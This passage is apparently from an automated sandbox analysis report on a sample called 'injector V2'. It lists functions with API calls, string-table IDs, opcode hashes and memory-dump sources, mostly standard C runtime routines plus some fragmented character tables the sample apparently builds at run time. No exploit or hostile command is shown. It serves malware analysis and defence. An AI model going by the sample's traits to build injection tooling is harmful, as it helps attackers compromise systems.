                                                                          • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                          • API String ID: 667068680-295688737
                                                                          • Opcode ID: 386a28745b337e0e84bb090383977d3a84e2e2090bec2c1bcffd76ff4af7bb0b
                                                                          • Instruction ID: 2d4544639c0fabbb2334cd06875d6fac6bfdb0125b7a98165589cac8d6c21863
                                                                          • Opcode Fuzzy Hash: 386a28745b337e0e84bb090383977d3a84e2e2090bec2c1bcffd76ff4af7bb0b
                                                                          • Instruction Fuzzy Hash: CD613575996350ABE7406FF5EC5D8CA3FEBAB0971230EE817B101D3260DBB451828BB5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AllocString
                                                                          • String ID: $ $)$*$-$.$0$1$<$=$B$C$I$M$O$R$\$a$h$n$q$y$|$}
                                                                          • API String ID: 2525500382-1673335896
                                                                          • Opcode ID: 96f3470083bcea610ea27e4d5848164b65705ac2e25992b9fb022690808485dd
                                                                          • Instruction ID: 1ef3aa5047203b16d8c5945151d0c6b62c14190839ef1e643782a11274fd5212
                                                                          • Opcode Fuzzy Hash: 96f3470083bcea610ea27e4d5848164b65705ac2e25992b9fb022690808485dd
                                                                          • Instruction Fuzzy Hash: D591D76150C7C18EE3328B3C884979BBFD16BA7224F084A9ED5E84B2D3C7794549C727
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: InitVariant
                                                                          • String ID: %$-$1$3$4$5$7$8$<$?
                                                                          • API String ID: 1927566239-2306056897
                                                                          • Opcode ID: 31193bd02edbf3f2dd8202ce71ad54a7358e2316d9c2a759cd42147c551f9b9f
                                                                          • Instruction ID: 96ca448ff6fb554567044703cf5f21603e263ad5c94d1bc94c9d14b434f46236
                                                                          • Opcode Fuzzy Hash: 31193bd02edbf3f2dd8202ce71ad54a7358e2316d9c2a759cd42147c551f9b9f
                                                                          • Instruction Fuzzy Hash: FA514C7060C7C18AD33A8B3894997DBBFD09BA6314F084A6ED1E98B3D2C6B44645CB53
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit
                                                                          • String ID: !$R$S$X$]$h$m$m$|
                                                                          • API String ID: 2610073882-107755797
                                                                          • Opcode ID: cbb7be2de71a0b186935c17f871dacbf23e22332363b1279cee9e02be5857cb9
                                                                          • Instruction ID: 206bfdd1e779fd651663f9837c9be222ba91a6427388020951cf9e3343fbc20d
                                                                          • Opcode Fuzzy Hash: cbb7be2de71a0b186935c17f871dacbf23e22332363b1279cee9e02be5857cb9
                                                                          • Instruction Fuzzy Hash: 6341483110C7C18AD315DB78849879EFFD16BA6324F084A6DE5E50B3E6C7B98509CB63
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit
                                                                          • String ID: !$R$S$X$]$h$m$m$|
                                                                          • API String ID: 2610073882-107755797
                                                                          • Opcode ID: 69ef725f91b2f09295a4b8331cec97355fd600f420917215be38744edb42d723
                                                                          • Instruction ID: 85031bd5868e3d12bd7d942b6f0e223c717926f06670f1c9bae8ad66f3a5564b
                                                                          • Opcode Fuzzy Hash: 69ef725f91b2f09295a4b8331cec97355fd600f420917215be38744edb42d723
                                                                          • Instruction Fuzzy Hash: F641273050CBC18AD3158B78944864EFFE26BE6324F484A5DE0E14B3E6C7B9850ACB63
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006091F2
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00609300
                                                                          • CatchIt.LIBVCRUNTIME ref: 00609351
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00609452
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0060946D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: @]`$csm$csm$csm
                                                                          • API String ID: 4119006552-3312551339
                                                                          • Opcode ID: 44f52fef10f82d995dedc586bed2fe14487202e119ff1793fb8e3ee037f1f68d
                                                                          • Instruction ID: 3016f033c445908f10900d40dad0f93e59d8fb4ed785d9069d62958cf1288aad
                                                                          • Opcode Fuzzy Hash: 44f52fef10f82d995dedc586bed2fe14487202e119ff1793fb8e3ee037f1f68d
                                                                          • Instruction Fuzzy Hash: 87B14871880209EFCF2DDFA4C8819AFB7B7BF14310B14415AE8516B292D731DA52CFA5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                          • String ID:
                                                                          • API String ID: 127012223-0
                                                                          • Opcode ID: 958fd76715f2481c9bec94f7afc18dc220cfa264ba4ead5c3ca9f7091f191630
                                                                          • Instruction ID: 6b10638dc25e9bc4a3cd96c350900d51597d1284e28d6bd1f5a1a3fdc9f4682a
                                                                          • Opcode Fuzzy Hash: 958fd76715f2481c9bec94f7afc18dc220cfa264ba4ead5c3ca9f7091f191630
                                                                          • Instruction Fuzzy Hash: B171D472900206ABFF219B648981BEF7BAB9F49310F1C4459F915A7381E7B5DDC08B64
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,00609EE2,006041E0,?,00000000,?,?,?,00609BEB,00000022,FlsSetValue,00613DDC,00613DE4,?), ref: 00609E94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3664257935-537541572
                                                                          • Opcode ID: a0b570e60c3da1a6054b55c6a7a6ffbf0325d7fcb3880e1d2b920ddcc840efd8
                                                                          • Instruction ID: 9a9ac5b7aca641b2095760e47fc584812a4cc0cb874b773b8e8fe5af7514b386
                                                                          • Opcode Fuzzy Hash: a0b570e60c3da1a6054b55c6a7a6ffbf0325d7fcb3880e1d2b920ddcc840efd8
                                                                          • Instruction Fuzzy Hash: 8421D531A80211ABD725DB60DC45ADB775BEF81B70B295121ED06A73E2DB30ED02C6F0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: d0921210a52644a5f9003f285b683830a48b2b9431452db0d1e712a88196bccc
                                                                          • Instruction ID: 39d0ce560d141fbab5cdd819bd48840ded4e5639cb042074cd29ec205f54d69a
                                                                          • Opcode Fuzzy Hash: d0921210a52644a5f9003f285b683830a48b2b9431452db0d1e712a88196bccc
                                                                          • Instruction Fuzzy Hash: F97136B490420DDFDB04DFA8D5586AEBFF0FB48700F10892AE956AB350DB389945DF52
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00608831,00605F0D,006055A4), ref: 00608848
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00608856
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0060886F
                                                                          • SetLastError.KERNEL32(00000000,00608831,00605F0D,006055A4), ref: 006088C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: 67633a0c199911832f80809b56d22c96d36956ffeed75a27b4afab131ecfbfd5
                                                                          • Instruction ID: 26b623a5a697a5a8925c9481550a18c81e7c7e487b339b206f7a6a477cc0ac4d
                                                                          • Opcode Fuzzy Hash: 67633a0c199911832f80809b56d22c96d36956ffeed75a27b4afab131ecfbfd5
                                                                          • Instruction Fuzzy Hash: 12014C322882115DEB6C9BB57C869DF3787EB627B0364933FF010421E1EF118C015284
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,006125EB,000000FF,?,00607015,?,?,006070B1,00000000), ref: 00606F89
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00606F9B
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,006125EB,000000FF,?,00607015,?,?,006070B1,00000000), ref: 00606FBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 6f8fca6ad2f3179b0b54b2877ee10a3b70c69d340c6c17e96a0a5d71d74f0a51
                                                                          • Instruction ID: 934280ff25b276e832d757a1e2dee35f7571ae6b6b6de95d3ae1ee7b91886bee
                                                                          • Opcode Fuzzy Hash: 6f8fca6ad2f3179b0b54b2877ee10a3b70c69d340c6c17e96a0a5d71d74f0a51
                                                                          • Instruction Fuzzy Hash: 09018F3194461AABDB018F50DC09FEEB7FAFB04B51F084526F811E23D0DB749900CAA0
                                                                          APIs
                                                                          • __alloca_probe_16.LIBCMT ref: 0060DFA2
                                                                          • __alloca_probe_16.LIBCMT ref: 0060E06B
                                                                          • __freea.LIBCMT ref: 0060E0D2
                                                                            • Part of subcall function 0060BC45: HeapAlloc.KERNEL32(00000000,?,00000000,?,006041E0,?,?,00601007,?,005FFAB5), ref: 0060BC77
                                                                          • __freea.LIBCMT ref: 0060E0E5
                                                                          • __freea.LIBCMT ref: 0060E0F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 1096550386-0
                                                                          • Opcode ID: 3f07d22e510e20fbf4ae9ae721f776d9f54fd709bca7c3c1c5ab4c2f37ce4c59
                                                                          • Instruction ID: a52548b5d6c2f01204a3c199645b9b2452c4b9245e58dcd40324dece409201a4
                                                                          • Opcode Fuzzy Hash: 3f07d22e510e20fbf4ae9ae721f776d9f54fd709bca7c3c1c5ab4c2f37ce4c59
                                                                          • Instruction Fuzzy Hash: 9A519372680226ABEB295F60CC41EFB76ABEF44710B15492DF916D6381FB72CC60C664
                                                                          APIs
                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006093FE,?,?,00000000,00000000,00000000,?), ref: 0060951D
                                                                          • CatchIt.LIBVCRUNTIME ref: 00609603
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CatchEncodePointer
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 1435073870-2084237596
                                                                          • Opcode ID: 7cc9451512d1ab4a2d742184d695c8d09be7e7f7815a54c254c2f7f20d410b79
                                                                          • Instruction ID: ba8aeba0b1b3876b7261d5ddc1a286bc4deb715d493b145df7f8d08dace7767c
                                                                          • Opcode Fuzzy Hash: 7cc9451512d1ab4a2d742184d695c8d09be7e7f7815a54c254c2f7f20d410b79
                                                                          • Instruction Fuzzy Hash: 32414771940209AFDF1ADF94CC81AEEBBB7EF48300F188099F905A7292D7369950DB60
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0060DCFA,00000000,?,0061CCD0,?,?,?,0060DC31,00000004,InitializeCriticalSectionEx,006146F8,00614700), ref: 0060DC6B
                                                                          • GetLastError.KERNEL32(?,0060DCFA,00000000,?,0061CCD0,?,?,?,0060DC31,00000004,InitializeCriticalSectionEx,006146F8,00614700,00000000,?,0060971C), ref: 0060DC75
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0060DC9D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3177248105-2084034818
                                                                          • Opcode ID: 52f98306c4187fed848710758ff9e62fe9ce612b16c56e0ad12ed772dd94fbb0
                                                                          • Instruction ID: 5af42f180c4baa0eef4ff5e1f96e0d9cae143db4e2e246d3e847dec306b04f08
                                                                          • Opcode Fuzzy Hash: 52f98306c4187fed848710758ff9e62fe9ce612b16c56e0ad12ed772dd94fbb0
                                                                          • Instruction Fuzzy Hash: 5BE048306C0205BFFF102F91EC0ABD93B9BAB01B58F14C031F90DE81E1EBA29851C554
                                                                          APIs
                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0060E64B
                                                                            • Part of subcall function 0060D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006087B1,?,00000000,?), ref: 0060D192
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0060E89D
                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0060E8E3
                                                                          • GetLastError.KERNEL32 ref: 0060E986
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 2112829910-0
                                                                          • Opcode ID: d68971195265c273f918c349e61ad0f53db39efad4aad9510cdcfbf48f56406c
                                                                          • Instruction ID: 195f73ff93b442b7bd33aeb10f4f37efa412dec202d68ce58d5f88803c0d8bec
                                                                          • Opcode Fuzzy Hash: d68971195265c273f918c349e61ad0f53db39efad4aad9510cdcfbf48f56406c
                                                                          • Instruction Fuzzy Hash: 80D18C75D402589FCF19CFA8D8809EEFBB6FF08314F18456AE456EB391D631A942CB50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer
                                                                          • String ID:
                                                                          • API String ID: 1740715915-0
                                                                          • Opcode ID: 6d0dd3256377f3260e8c5fdf90aa245ae749048ce0d1c0137e100bdc000c9dc0
                                                                          • Instruction ID: f739e72823b57d1503d00052262eb998e66a82a9cedbc8fc65eee28e5bd85988
                                                                          • Opcode Fuzzy Hash: 6d0dd3256377f3260e8c5fdf90aa245ae749048ce0d1c0137e100bdc000c9dc0
                                                                          • Instruction Fuzzy Hash: 5B51B071685602AFDB2D8F24C841BAB77A7FF40350F14452DE9469B2E2EB31EC41CBA4
                                                                          APIs
                                                                            • Part of subcall function 0060D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006087B1,?,00000000,?), ref: 0060D192
                                                                          • GetLastError.KERNEL32 ref: 0060C61C
                                                                          • __dosmaperr.LIBCMT ref: 0060C623
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0060C65D
                                                                          • __dosmaperr.LIBCMT ref: 0060C664
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1913693674-0
                                                                          • Opcode ID: 24efbb51c072c034a4093e52d372170ee738bafc41a0bbd8c18c296b157d46ba
                                                                          • Instruction ID: 71767a91d749248ddbebb3da48120a618fe5663b58ebe69ddb97bc7d09a22416
                                                                          • Opcode Fuzzy Hash: 24efbb51c072c034a4093e52d372170ee738bafc41a0bbd8c18c296b157d46ba
                                                                          • Instruction Fuzzy Hash: 4421D371280205AFCB28AF618C8096BB7ABEF443747109728F815932D1D731EC019B94
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2306a680740476528b25654b1cacaab1f42f1a9ecb4ce8e5f578174521c222d
                                                                          • Instruction ID: 645d292248e9491ef5cb64f1b936c23e8c4f04460c3bb21068463e209988d407
                                                                          • Opcode Fuzzy Hash: c2306a680740476528b25654b1cacaab1f42f1a9ecb4ce8e5f578174521c222d
                                                                          • Instruction Fuzzy Hash: 5D21C671280205AFDB28AF69DC91DAB77ABEF453B47108729F919972D1D730EC409BA0
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0060D235
                                                                            • Part of subcall function 0060D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006087B1,?,00000000,?), ref: 0060D192
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0060D26D
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0060D28D
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 158306478-0
                                                                          • Opcode ID: 7023ee06924e55dee57c1782168ffbbed45f10e9d65c40dcb7a9dd55fbb28da2
                                                                          • Instruction ID: f0cf7ff27ea5f247c0e54117a9cef729360b3b57976ae2fca76e139fdcc55ffd
